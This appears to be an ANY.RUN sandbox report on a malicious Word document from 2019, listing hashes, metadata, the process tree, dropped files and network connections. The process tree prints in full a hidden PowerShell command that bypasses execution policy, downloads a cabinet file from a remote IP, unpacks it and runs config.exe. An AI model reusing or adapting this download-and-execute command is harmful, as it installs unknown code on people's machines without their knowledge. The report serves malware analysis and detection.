| Field | Value |
|---|---|
| File name | 0351c808c016cd5190ea45d5243c6a2c6cd3b5fc4e22571e06b948910e5535f9.doc |
| Full analysis | https://app.any.run/tasks/2496fe31-5977-4550-b55c-f826fcfd5189 |
| Verdict | Malicious activity |
| Analysis date | May 20, 2019, 05:30:53 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| File info | Microsoft Word 2007+ |
| MD5 | 25CCAFF20702C318062741E3AFC00526 |
| SHA1 | EB66C76C1373089A1B2442F50FF3164304FA57F9 |
| SHA256 | 0351C808C016CD5190EA45D5243C6A2C6CD3B5FC4E22571E06B948910E5535F9 |
| SSDEEP | 384:aWUBwlVKqj4zorih1j8v55ng/IuveW83CrIQXlzmLp:aQkqjCorih1jingwuL83Crx1zyp |
| Extension | Description |
|---|---|
| .docx | Word Microsoft Office Open XML Format document (52.2) |
| .zip | Open Packaging Conventions container (38.8) |
| .zip | ZIP compressed archive (8.8) |
| Field | Value |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | 0x0006 |
| ZipCompression | Deflated |
| ZipModifyDate | 1980:01:01 00:00:00 |
| ZipCRC | 0x24886c04 |
| ZipCompressedSize | 373 |
| ZipUncompressedSize | 1460 |
| ZipFileName | [Content_Types].xml |
| Field | Value |
|---|---|
| Title | - |
| Subject | - |
| Creator | Dell_20170514745 |
| Description | - |
| Keywords | - |
| LastModifiedBy | Dell_20170514745 |
| RevisionNumber | 2 |
| CreateDate | 2019:05:17 12:21:00Z |
| ModifyDate | 2019:05:17 12:22:00Z |
| Template | Normal.dotm |
| TotalEditTime | 1 minute |
| Pages | 1 |
| Words | 14 |
| Characters | 81 |
| Application | Microsoft Office Word |
| DocSecurity | None |
| Lines | 1 |
| Paragraphs | 1 |
| ScaleCrop | No |
| Company | - |
| LinksUpToDate | No |
| CharactersWithSpaces | 94 |
| SharedDoc | No |
| HyperlinksChanged | No |
| AppVersion | 16 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3288 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0351c808c016cd5190ea45d5243c6a2c6cd3b5fc4e22571e06b948910e5535f9.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2384 | cmd /c ""C:\Users\admin\AppData\Local\Temp\info.bat" " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
272 | cmd /c start powershell.exe -ep Bypass -NoP -NonI -W Hidden (new-object System.Net.WebClient).DownloadFile('http://137.59.18.154/test.cab','C:\Users\admin\AppData\Local\Temp\\test.cab'); expand 'C:\Users\admin\AppData\Local\Temp\\test.cab' C:\Users\admin\AppData\Local\Temp -f:* ;Start-Process 'C:\Users\admin\AppData\Local\Temp\\config.exe' | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3452 | powershell.exe -ep Bypass -NoP -NonI -W Hidden (new-object System.Net.WebClient).DownloadFile('http://137.59.18.154/test.cab','C:\Users\admin\AppData\Local\Temp\\test.cab'); expand 'C:\Users\admin\AppData\Local\Temp\\test.cab' C:\Users\admin\AppData\Local\Temp -f:* ;Start-Process 'C:\Users\admin\AppData\Local\Temp\\config.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2532 | "C:\Windows\system32\expand.exe" C:\Users\admin\AppData\Local\Temp\\test.cab C:\Users\admin\AppData\Local\Temp -f:* | C:\Windows\system32\expand.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: LZ Expansion Utility Exit code: 4294967295 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3288 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREE93.tmp.cvr | — | — | —
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MVL5CB038IP9L9WBNMSH.temp | — | — | —
3288 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$51c808c016cd5190ea45d5243c6a2c6cd3b5fc4e22571e06b948910e5535f9.doc | pgc | 4A8806E8656FD16703FF5F7C613578E1 | 33E685BE90EBEAE820BE51089FF4B9F7C43526F6701AC552DA18A046E650B7CD
3288 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 17222E7BED955763CB75EBDA153E0074 | EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1216dc.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3288 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\841A6DF.emf | emf | 64D6A44B556634933D5E1B69B9322B56 | B43651184A6470B1D95E0B27FB50968CB2E6ECDE667D7F782DE0D89B1D66E061
3288 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\info.bat | text | 8919BE6828E014EEC87C10A3FC6C5009 | 879CE5D45487536B62FC523074934EDA2DA1707C696387A91CDBA4828EF7539B
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3452 | powershell.exe | GET | 404 | 137.59.18.154:80 | http://137.59.18.154/test.cab | HK | html | 285 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3452 | powershell.exe | 137.59.18.154:80 | — | Xima Network | HK | suspicious |